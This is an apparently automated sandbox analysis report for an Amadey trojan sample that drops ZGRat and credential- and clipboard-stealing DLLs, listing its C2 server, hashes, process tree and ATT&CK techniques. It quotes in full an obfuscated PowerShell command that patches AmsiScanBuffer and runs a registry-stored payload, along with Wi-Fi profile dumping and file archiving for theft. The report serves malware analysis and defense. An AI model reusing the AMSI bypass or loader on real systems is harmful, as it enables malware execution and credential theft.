Resubmissions

29-03-2024 14:25

240329-rrdgpsad9y

Analysis

  • max time kernel
    130s
  • max time network
    128s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240221-en
  • resource tags

    arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    29-03-2024 17:47

General

  • Target

    7ef012907eb337ad94d0635a9d1a1dd64ccb32b5c193a5bb732eee3dd22013da.exe

  • Size

    1.9MB

  • MD5

    864674e8be395eb28bb181184add5c01

  • SHA1

    79bb9c0ae54bf8572328af06b6576327bd0a386c

  • SHA256

    7ef012907eb337ad94d0635a9d1a1dd64ccb32b5c193a5bb732eee3dd22013da

  • SHA512

    7f85146e5cca26f5a388aeea88cf9d86819aed6e240c3b94569967a2074654327e531be66f1335f9fa0790f13844c65315a3020d0e9c6bdce40c3605164abc25

  • SSDEEP

    49152:EJ8NNvupgJi+RYYhQx/QAfi4oxa03C+v7sOh9yPQtE:Xvu+RIx/QAfiTY03C+z/yP

Malware Config

Extracted

Family

amadey

Version

4.17

C2

http://185.215.113.32

Attributes
  • install_dir

    00c07260dc

  • install_file

    explorgu.exe

  • strings_key

    461809bd97c251ba0c0c8450c7055f1d

  • url_paths

    /yandex/index.php

rc4.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect ZGRat V1 37 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 5 IoCs
  • Identifies Wine through registry keys 2 TTPs 2 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 3 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Modifies data under HKEY_USERS 41 IoCs
  • Suspicious behavior: EnumeratesProcesses 27 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:648
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:432
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{d6f4c55d-5a15-4d45-b0ab-170d15c029d0}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:972
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:704
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:1008
        • C:\Windows\System32\svchost.exe
          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
          1⤵
            PID:448
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:764
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:1084
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                1⤵
                  PID:1152
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                  1⤵
                    PID:1164
                    • C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
                      C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
                      2⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of WriteProcessMemory
                      PID:3296
                      • C:\Users\Admin\AppData\Local\Temp\1001063001\Tcgprylsch.exe
                        "C:\Users\Admin\AppData\Local\Temp\1001063001\Tcgprylsch.exe"
                        3⤵
                        • Executes dropped EXE
                        • Adds Run key to start application
                        • Suspicious use of SetThreadContext
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:2340
                        • C:\Users\Admin\AppData\Local\Temp\$77a9f2a5
                          "C:\Users\Admin\AppData\Local\Temp\$77a9f2a5"
                          4⤵
                          • Executes dropped EXE
                          PID:3840
                        • C:\Users\Admin\AppData\Local\Temp\$77b76f3f
                          "C:\Users\Admin\AppData\Local\Temp\$77b76f3f"
                          4⤵
                          • Executes dropped EXE
                          • Adds Run key to start application
                          PID:4580
                      • C:\Users\Admin\AppData\Local\Temp\1001065001\koooooo.exe
                        "C:\Users\Admin\AppData\Local\Temp\1001065001\koooooo.exe"
                        3⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • Suspicious use of WriteProcessMemory
                        PID:1680
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          4⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:584
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1680 -s 888
                          4⤵
                          • Program crash
                          PID:1996
                      • C:\Windows\SysWOW64\rundll32.exe
                        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
                        3⤵
                        • Loads dropped DLL
                        • Suspicious use of WriteProcessMemory
                        PID:1880
                        • C:\Windows\system32\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
                          4⤵
                          • Blocklisted process makes network request
                          • Loads dropped DLL
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of WriteProcessMemory
                          PID:4024
                          • C:\Windows\system32\netsh.exe
                            netsh wlan show profiles
                            5⤵
                              PID:124
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\930051783255_Desktop.zip' -CompressionLevel Optimal
                              5⤵
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:656
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
                          3⤵
                          • Blocklisted process makes network request
                          • Loads dropped DLL
                          PID:4728
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:frhWTbVufAMv{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EvNAQlXSkzbAKi,[Parameter(Position=1)][Type]$ZalVODklUZ)$vpUCeOBdSQR=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+'tedDel'+[Char](101)+'ga'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InM'+'e'+''+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+''+'M'+'o'+'d'+'ul'+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+'el'+'e'+''+[Char](103)+''+[Char](97)+''+'t'+''+'e'+''+[Char](84)+''+[Char](121)+''+[Char](112)+'e',''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'P'+'u'+'b'+'li'+[Char](99)+''+','+''+[Char](83)+''+[Char](101)+'al'+[Char](101)+''+'d'+''+[Char](44)+''+'A'+'n'+[Char](115)+''+'i'+'Cl'+'a'+'s'+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+'t'+[Char](111)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$vpUCeOBdSQR.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+','+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$EvNAQlXSkzbAKi).SetImplementationFlags('R'+[Char](117)+''+'n'+''+[Char](116)+''+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');$vpUCeOBdSQR.DefineMethod(''+[Char](73)+'nv'+'o'+''+'k'+''+'e'+'','P'+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+',H'+'i'+''+'d'+'e'+'B'+'y'+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+'wS'+'l'+''+'o'+'t,'+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$ZalVODklUZ,$EvNAQlXSkzbAKi).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+'im'+[Char](101)+''+','+''+[Char](77)+'an'+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');Write-Output $vpUCeOBdSQR.CreateType();}$UFfWCbVtGapxm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+'t'+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+'l')}).GetType('M'+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+'o'+''+[Char](102)+''+'t'+'.'+'W'+''+'i'+''+[Char](110)+'3'+[Char](50)+''+'.'+''+'U'+''+[Char](110)+''+'s'+''+[Char](97)+'f'+[Char](101)+'N'+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+'t'+'h'+[Char](111)+''+'d'+''+[Char](115)+'');$jhrjzvwwFPvmVM=$UFfWCbVtGapxm.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'P'+''+'r'+''+[Char](111)+''+[Char](99)+'Ad'+'d'+''+[Char](114)+''+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$AohDqoMhECLnpjccyGk=frhWTbVufAMv @([String])([IntPtr]);$ZBiVJDYHoIMYjpCqaICrCx=frhWTbVufAMv @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$mcPJOczZoqT=$UFfWCbVtGapxm.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+'M'+''+[Char](111)+''+'d'+''+[Char](117)+'l'+[Char](101)+'H'+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+'n'+[Char](101)+''+[Char](108)+''+'3'+''+[Char](50)+''+[Char](46)+''+'d'+''+'l'+''+'l'+'')));$CwxxDAtSJMiXma=$jhrjzvwwFPvmVM.Invoke($Null,@([Object]$mcPJOczZoqT,[Object](''+'L'+''+[Char](111)+'a'+[Char](100)+''+'L'+''+'i'+''+[Char](98)+''+'r'+''+'a'+''+'r'+''+[Char](121)+'A')));$AhEBfyYhemzLsRxbn=$jhrjzvwwFPvmVM.Invoke($Null,@([Object]$mcPJOczZoqT,[Object](''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+'u'+''+'a'+''+'l'+'P'+'r'+''+'o'+'t'+[Char](101)+'c'+[Char](116)+'')));$WCxgQZS=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CwxxDAtSJMiXma,$AohDqoMhECLnpjccyGk).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$YMJjyPPyOwrfAKjLw=$jhrjzvwwFPvmVM.Invoke($Null,@([Object]$WCxgQZS,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+'a'+''+'n'+''+[Char](66)+'u'+[Char](102)+''+[Char](102)+'e'+[Char](114)+'')));$fIOSkTSzZN=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AhEBfyYhemzLsRxbn,$ZBiVJDYHoIMYjpCqaICrCx).Invoke($YMJjyPPyOwrfAKjLw,[uint32]8,4,[ref]$fIOSkTSzZN);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$YMJjyPPyOwrfAKjLw,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AhEBfyYhemzLsRxbn,$ZBiVJDYHoIMYjpCqaICrCx).Invoke($YMJjyPPyOwrfAKjLw,[uint32]8,0x20,[ref]$fIOSkTSzZN);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+'F'+''+'T'+'WAR'+'E'+'').GetValue('$'+[Char](55)+''+[Char](55)+''+'s'+''+[Char](116)+''+[Char](97)+'ge'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:4784
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
                      1⤵
                        PID:1224
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                        1⤵
                          PID:1248
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                          1⤵
                            PID:1336
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                            1⤵
                              PID:1432
                            • C:\Windows\System32\svchost.exe
                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                              1⤵
                                PID:1476
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                1⤵
                                  PID:1536
                                  • C:\Windows\system32\sihost.exe
                                    sihost.exe
                                    2⤵
                                      PID:2128
                                    • C:\Windows\system32\sihost.exe
                                      sihost.exe
                                      2⤵
                                        PID:1600
                                      • C:\Windows\system32\sihost.exe
                                        sihost.exe
                                        2⤵
                                          PID:3872
                                        • C:\Windows\system32\sihost.exe
                                          sihost.exe
                                          2⤵
                                            PID:3524
                                          • C:\Windows\system32\sihost.exe
                                            sihost.exe
                                            2⤵
                                              PID:4688
                                            • C:\Windows\system32\sihost.exe
                                              sihost.exe
                                              2⤵
                                                PID:3476
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                              1⤵
                                                PID:1584
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                1⤵
                                                  PID:1604
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k NetworkService -p
                                                  1⤵
                                                    PID:1668
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                    1⤵
                                                      PID:1724
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                      1⤵
                                                        PID:1776
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                        1⤵
                                                          PID:1860
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                          1⤵
                                                            PID:1868
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                            1⤵
                                                              PID:1080
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                              1⤵
                                                                PID:1208
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                1⤵
                                                                  PID:1288
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                  1⤵
                                                                    PID:2072
                                                                  • C:\Windows\sysmon.exe
                                                                    C:\Windows\sysmon.exe
                                                                    1⤵
                                                                      PID:2656
                                                                    • C:\Users\Admin\AppData\Local\Temp\7ef012907eb337ad94d0635a9d1a1dd64ccb32b5c193a5bb732eee3dd22013da.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\7ef012907eb337ad94d0635a9d1a1dd64ccb32b5c193a5bb732eee3dd22013da.exe"
                                                                      1⤵
                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                      • Checks BIOS information in registry
                                                                      • Identifies Wine through registry keys
                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                      • Drops file in Windows directory
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:4172
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1680 -ip 1680
                                                                      1⤵
                                                                        PID:1368

                                                                      Network

                                                                      MITRE ATT&CK Matrix ATT&CK v13

                                                                      Persistence

                                                                      Boot or Logon Autostart Execution

                                                                      1
                                                                      T1547

                                                                      Registry Run Keys / Startup Folder

                                                                      1
                                                                      T1547.001

                                                                      Privilege Escalation

                                                                      Boot or Logon Autostart Execution

                                                                      1
                                                                      T1547

                                                                      Registry Run Keys / Startup Folder

                                                                      1
                                                                      T1547.001

                                                                      Defense Evasion

                                                                      Virtualization/Sandbox Evasion

                                                                      2
                                                                      T1497

                                                                      Modify Registry

                                                                      1
                                                                      T1112

                                                                      Credential Access

                                                                      Unsecured Credentials

                                                                      5
                                                                      T1552

                                                                      Credentials In Files

                                                                      4
                                                                      T1552.001

                                                                      Credentials in Registry

                                                                      1
                                                                      T1552.002

                                                                      Discovery

                                                                      Query Registry

                                                                      4
                                                                      T1012

                                                                      Virtualization/Sandbox Evasion

                                                                      2
                                                                      T1497

                                                                      System Information Discovery

                                                                      2
                                                                      T1082

                                                                      Collection

                                                                      Data from Local System

                                                                      5
                                                                      T1005

                                                                      Replay Monitor

                                                                      Loading Replay Monitor...

                                                                      Downloads

                                                                      • C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                        Filesize

                                                                        1.9MB

                                                                        MD5

                                                                        864674e8be395eb28bb181184add5c01

                                                                        SHA1

                                                                        79bb9c0ae54bf8572328af06b6576327bd0a386c

                                                                        SHA256

                                                                        7ef012907eb337ad94d0635a9d1a1dd64ccb32b5c193a5bb732eee3dd22013da

                                                                        SHA512

                                                                        7f85146e5cca26f5a388aeea88cf9d86819aed6e240c3b94569967a2074654327e531be66f1335f9fa0790f13844c65315a3020d0e9c6bdce40c3605164abc25

                                                                      • C:\Users\Admin\AppData\Local\Temp\1001063001\Tcgprylsch.exe
                                                                        Filesize

                                                                        2.4MB

                                                                        MD5

                                                                        69c9404e02e3d62bf925fb6f3e904393

                                                                        SHA1

                                                                        d9e1c766d54244ed5ad97bed3055ccecbd7e08fd

                                                                        SHA256

                                                                        6ee5b0595ce9ca29e97c2029236b7df8e4161cd1015954cc9a2c15760c88806c

                                                                        SHA512

                                                                        209975e9cfe82e3aa0d02410936633eb95682fbf5d31cb8947361fbabcbfad8341fc0888989d5585be86d6a54d55d1c3d57b05cde71014860cf815118ab90e89

                                                                      • C:\Users\Admin\AppData\Local\Temp\1001065001\koooooo.exe
                                                                        Filesize

                                                                        379KB

                                                                        MD5

                                                                        90f41880d631e243cec086557cb74d63

                                                                        SHA1

                                                                        cb385e4172cc227ba72baf29ca1c4411fa99a26d

                                                                        SHA256

                                                                        23b62a27e3f5c424b16f31e5009af4f24c8bd13b1f035f87879e2a29236be7a0

                                                                        SHA512

                                                                        eeb85b34aa66a7e9a1b1807012999ee439433df23126a52ffa8d4b3cb2026be3bcf63ca25f143de58ba929c0d4feeaf2a603fd6ec6b5379fc48147c22f3783e3

                                                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3agy0mis.cs3.ps1
                                                                        Filesize

                                                                        60B

                                                                        MD5

                                                                        d17fe0a3f47be24a6453e9ef58c94641

                                                                        SHA1

                                                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                        SHA256

                                                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                        SHA512

                                                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                      • C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll
                                                                        Filesize

                                                                        109KB

                                                                        MD5

                                                                        2afdbe3b99a4736083066a13e4b5d11a

                                                                        SHA1

                                                                        4d4856cf02b3123ac16e63d4a448cdbcb1633546

                                                                        SHA256

                                                                        8d31b39170909595b518b1a03e9ec950540fabd545ed14817cac5c84b91599ee

                                                                        SHA512

                                                                        d89b3c46854153e60e3fa825b394344eee33936d7dbf186af9d95c9adae54428609e3bf21a18d38fce3d96f3e0b8e4e0ed25cb5004fbe288de3aef3a85b1d93f

                                                                      • C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll
                                                                        Filesize

                                                                        1.2MB

                                                                        MD5

                                                                        92fbdfccf6a63acef2743631d16652a7

                                                                        SHA1

                                                                        971968b1378dd89d59d7f84bf92f16fc68664506

                                                                        SHA256

                                                                        b4588feacc183cd5a089f9bb950827b75df04bd5a6e67c95ff258e4a34aa0d72

                                                                        SHA512

                                                                        b8ea216d4a59d8858fd4128abb555f8dcf3acca9138e663b488f09dc5200db6dc11ecc235a355e801145bbbb44d7beac6147949d75d78b32fe9cfd2fa200d117

                                                                      • memory/584-209-0x0000000002F80000-0x0000000003080000-memory.dmp
                                                                        Filesize

                                                                        1024KB

                                                                      • memory/584-207-0x0000000002F80000-0x0000000003080000-memory.dmp
                                                                        Filesize

                                                                        1024KB

                                                                      • memory/584-234-0x0000000003080000-0x00000000030C0000-memory.dmp
                                                                        Filesize

                                                                        256KB

                                                                      • memory/584-233-0x0000000003080000-0x00000000030C0000-memory.dmp
                                                                        Filesize

                                                                        256KB

                                                                      • memory/584-231-0x0000000003080000-0x00000000030C0000-memory.dmp
                                                                        Filesize

                                                                        256KB

                                                                      • memory/584-228-0x0000000003080000-0x00000000030C0000-memory.dmp
                                                                        Filesize

                                                                        256KB

                                                                      • memory/584-240-0x0000000003080000-0x00000000030C0000-memory.dmp
                                                                        Filesize

                                                                        256KB

                                                                      • memory/584-227-0x0000000003080000-0x00000000030C0000-memory.dmp
                                                                        Filesize

                                                                        256KB

                                                                      • memory/584-225-0x0000000003080000-0x00000000030C0000-memory.dmp
                                                                        Filesize

                                                                        256KB

                                                                      • memory/584-223-0x0000000003080000-0x00000000030C0000-memory.dmp
                                                                        Filesize

                                                                        256KB

                                                                      • memory/584-220-0x0000000002F80000-0x0000000003080000-memory.dmp
                                                                        Filesize

                                                                        1024KB

                                                                      • memory/584-222-0x0000000002F80000-0x0000000003080000-memory.dmp
                                                                        Filesize

                                                                        1024KB

                                                                      • memory/584-218-0x0000000002F80000-0x0000000003080000-memory.dmp
                                                                        Filesize

                                                                        1024KB

                                                                      • memory/584-216-0x0000000002F80000-0x0000000003080000-memory.dmp
                                                                        Filesize

                                                                        1024KB

                                                                      • memory/584-214-0x0000000002F80000-0x0000000003080000-memory.dmp
                                                                        Filesize

                                                                        1024KB

                                                                      • memory/584-211-0x0000000002F80000-0x0000000003080000-memory.dmp
                                                                        Filesize

                                                                        1024KB

                                                                      • memory/584-122-0x0000000000400000-0x000000000044C000-memory.dmp
                                                                        Filesize

                                                                        304KB

                                                                      • memory/584-245-0x0000000003080000-0x00000000030C0000-memory.dmp
                                                                        Filesize

                                                                        256KB

                                                                      • memory/584-206-0x0000000002F80000-0x0000000003080000-memory.dmp
                                                                        Filesize

                                                                        1024KB

                                                                      • memory/584-236-0x0000000003080000-0x00000000030C0000-memory.dmp
                                                                        Filesize

                                                                        256KB

                                                                      • memory/584-204-0x0000000002F80000-0x0000000003080000-memory.dmp
                                                                        Filesize

                                                                        1024KB

                                                                      • memory/584-202-0x0000000002F80000-0x0000000003080000-memory.dmp
                                                                        Filesize

                                                                        1024KB

                                                                      • memory/584-199-0x0000000002F80000-0x0000000003080000-memory.dmp
                                                                        Filesize

                                                                        1024KB

                                                                      • memory/584-196-0x0000000002F80000-0x0000000003080000-memory.dmp
                                                                        Filesize

                                                                        1024KB

                                                                      • memory/584-197-0x0000000002F80000-0x0000000003080000-memory.dmp
                                                                        Filesize

                                                                        1024KB

                                                                      • memory/584-193-0x0000000002F80000-0x0000000003080000-memory.dmp
                                                                        Filesize

                                                                        1024KB

                                                                      • memory/584-191-0x0000000002F80000-0x0000000003080000-memory.dmp
                                                                        Filesize

                                                                        1024KB

                                                                      • memory/584-190-0x0000000002F80000-0x0000000003080000-memory.dmp
                                                                        Filesize

                                                                        1024KB

                                                                      • memory/584-188-0x0000000002F80000-0x0000000003080000-memory.dmp
                                                                        Filesize

                                                                        1024KB

                                                                      • memory/584-186-0x0000000002F80000-0x0000000003080000-memory.dmp
                                                                        Filesize

                                                                        1024KB

                                                                      • memory/584-183-0x0000000002F80000-0x0000000003080000-memory.dmp
                                                                        Filesize

                                                                        1024KB

                                                                      • memory/584-182-0x0000000002F80000-0x0000000003080000-memory.dmp
                                                                        Filesize

                                                                        1024KB

                                                                      • memory/584-179-0x0000000002F80000-0x0000000003080000-memory.dmp
                                                                        Filesize

                                                                        1024KB

                                                                      • memory/584-178-0x0000000002F80000-0x0000000003080000-memory.dmp
                                                                        Filesize

                                                                        1024KB

                                                                      • memory/584-133-0x0000000000D80000-0x0000000000D81000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/584-134-0x0000000000400000-0x000000000044C000-memory.dmp
                                                                        Filesize

                                                                        304KB

                                                                      • memory/584-126-0x0000000000400000-0x000000000044C000-memory.dmp
                                                                        Filesize

                                                                        304KB

                                                                      • memory/584-242-0x0000000003080000-0x00000000030C0000-memory.dmp
                                                                        Filesize

                                                                        256KB

                                                                      • memory/1680-116-0x00000000730D0000-0x0000000073881000-memory.dmp
                                                                        Filesize

                                                                        7.7MB

                                                                      • memory/1680-114-0x0000000000BF0000-0x0000000000C56000-memory.dmp
                                                                        Filesize

                                                                        408KB

                                                                      • memory/1680-158-0x00000000730D0000-0x0000000073881000-memory.dmp
                                                                        Filesize

                                                                        7.7MB

                                                                      • memory/1680-131-0x0000000002E90000-0x0000000004E90000-memory.dmp
                                                                        Filesize

                                                                        32.0MB

                                                                      • memory/2340-61-0x00000000052A0000-0x00000000054DB000-memory.dmp
                                                                        Filesize

                                                                        2.2MB

                                                                      • memory/2340-139-0x00000000052A0000-0x00000000054DB000-memory.dmp
                                                                        Filesize

                                                                        2.2MB

                                                                      • memory/2340-111-0x00000000052A0000-0x00000000054DB000-memory.dmp
                                                                        Filesize

                                                                        2.2MB

                                                                      • memory/2340-107-0x00000000052A0000-0x00000000054DB000-memory.dmp
                                                                        Filesize

                                                                        2.2MB

                                                                      • memory/2340-59-0x00000000052A0000-0x00000000054DB000-memory.dmp
                                                                        Filesize

